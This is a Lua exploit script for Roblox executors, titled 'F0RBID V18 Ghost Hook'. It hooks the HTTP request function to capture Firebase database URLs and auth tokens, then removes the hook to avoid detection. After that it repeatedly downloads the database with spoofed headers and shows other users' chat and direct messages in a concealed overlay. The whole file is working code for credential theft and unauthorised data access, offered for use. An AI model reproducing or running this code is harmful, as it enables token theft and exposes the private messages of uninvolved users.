-- ========================================================== --
-- 🌑 F0RBID V18: THE GHOST HOOK (ULTRA-STEALTH BYPASS)
-- ========================================================== --
print("[F0RBID] 🛰️ Ghost Hook Protocol Engaged. Identity: [HIDDEN]")

local HttpService = game:GetService("HttpService")
local CoreGui = game:GetService("CoreGui")
local processedData = {}

local TARGET_URL = nil
local TARGET_AUTH = nil

-- ========================================== --
-- 1. F0RBID GHOST UI (STEALTH RED)
-- ========================================== --
local uiParent = (gethui and gethui()) or CoreGui
if uiParent:FindFirstChild("F0rbidGhostV18") then uiParent.F0rbidGhostV18:Destroy() end

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = "F0rbidGhostV18"
ScreenGui.Parent = uiParent

local Main = Instance.new("Frame")
Main.Size = UDim2.new(0, 550, 0, 450)
Main.Position = UDim2.new(0.5, -275, 0.5, -225)
Main.BackgroundColor3 = Color3.fromRGB(5, 5, 5)
Main.BorderSizePixel = 0
Main.Active = true
Main.Draggable = true
Main.Parent = ScreenGui

local Corner = Instance.new("UICorner")
Corner.CornerRadius = UDim.new(0, 8)
Corner.Parent = Main

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, -20, 0, 45)
Title.Position = UDim2.new(0, 15, 0, 5)
Title.BackgroundTransparency = 1
Title.Text = "F0RBID <font color='#FF0000'>[GHOST HOOK V18]</font>"
Title.RichText = true
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.Font = Enum.Font.GothamBold
Title.TextSize = 19
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Parent = Main

local Status = Instance.new("TextLabel")
Status.Size = UDim2.new(1, -30, 0, 20)
Status.Position = UDim2.new(0, 15, 0, 40)
Status.BackgroundTransparency = 1
Status.Text = "● STATUS: WAITING FOR GHOST INTERCEPT..."
Status.TextColor3 = Color3.fromRGB(150, 0, 0)
Status.Font = Enum.Font.Code
Status.TextSize = 11
Status.TextXAlignment = Enum.TextXAlignment.Left
Status.Parent = Main

local Scroll = Instance.new("ScrollingFrame")
Scroll.Size = UDim2.new(1, -20, 1, -110)
Scroll.Position = UDim2.new(0, 10, 0, 80)
Scroll.BackgroundTransparency = 1
Scroll.ScrollBarThickness = 2
Scroll.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0)
Scroll.Parent = Main

local UIList = Instance.new("UIListLayout")
UIList.SortOrder = Enum.SortOrder.LayoutOrder
UIList.Padding = UDim.new(0, 4)
UIList.Parent = Scroll

local function AddLog(tag, user, msg)
    local txt = Instance.new("TextLabel")
    txt.Size = UDim2.new(1, 0, 0, 0)
    txt.BackgroundTransparency = 1
    txt.RichText = true
    txt.Text = string.format("<font color='#FF0000'>[%s]</font> <b>%s:</b> %s", tag, user, msg)
    txt.TextColor3 = Color3.fromRGB(220, 220, 220)
    txt.Font = Enum.Font.Code
    txt.TextSize = 12
    txt.TextWrapped = true
    txt.TextXAlignment = Enum.TextXAlignment.Left
    txt.Parent = Scroll
    
    txt.Size = UDim2.new(1, 0, 0, txt.TextBounds.Y + 2)
    Scroll.CanvasSize = UDim2.new(0, 0, 0, UIList.AbsoluteContentSize.Y)
    Scroll.CanvasPosition = Vector2.new(0, 99999)
end

-- ========================================== --
-- 2. FORCEFUL NEURAL EXTRACTION
-- ========================================== --
local function ForceExtract(data, path)
    if type(data) ~= "table" then return end
    for k, v in pairs(data) do
        local currentPath = path .. "/" .. tostring(k)
        if type(v) == "table" then
            local m = v.m or v.message or v.content or v.text or v.val
            local u = v.n or v.u or v.sender or v.username or "Ghost"
            
            if m and type(m) == "string" and #m > 1 and not m:find("firebase") then
                local tag = "LIVE"
                if currentPath:lower():find("dm") then tag = "DM"
                elseif #tostring(k) > 8 then tag = "SERVER" end
                
                local id = tostring(u)..tostring(m)..tag
                if not processedData[id] then
                    processedData[id] = true
                    AddLog(tag, tostring(u), tostring(m))
                end
            end
            ForceExtract(v, currentPath)
        end
    end
end

local function StartGhostSync()
    task.spawn(function()
        while task.wait(1) do
            if TARGET_URL and TARGET_AUTH then
                pcall(function()
                    local res = request({
                        Url = TARGET_URL .. "/.json?auth=" .. TARGET_AUTH,
                        Method = "GET",
                        Headers = {
                            ["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
                            ["X-Forwarded-For"] = string.format("%d.%d.%d.%d", math.random(1,255), math.random(1,255), math.random(1,255), math.random(1,255))
                        }
                    })
                    if res.Success then
                        local decoded = HttpService:JSONDecode(res.Body)
                        if decoded then ForceExtract(decoded, "VOID") end
                    end
                end)
            end
        end
    end)
end

-- ========================================== --
-- 3. THE GHOST HOOK (SELF-DESTRUCTING)
-- ========================================== --
local hook
hook = hookfunction(request, function(args)
    if args.Url:find("firebaseio.com") and args.Url:find("auth=") then
        TARGET_URL = args.Url:match("(https://[%w%-]+%.firebaseio%.com)")
        TARGET_AUTH = args.Url:match("auth=([%w%.%-_]+)")
        
        if TARGET_URL and TARGET_AUTH then
            Status.Text = "● STATUS: 🟢 GHOST INTERCEPT SUCCESSFUL"
            Status.TextColor3 = Color3.fromRGB(0, 255, 0)
            
            -- SELF-DESTRUCT: Remove hook immediately after capture to avoid kick
            hookfunction(request, hook)
            warn("🎯 [F0RBID] Hook Disengaged. Extraction Started.")
            StartGhostSync()
        end
    end
    return hook(args)
end)

-- Fallback for other executors
if syn and syn.request then hookfunction(syn.request, hook) end

print("✅ F0RBID V18 Ready. Ghost Hook is lurking...")
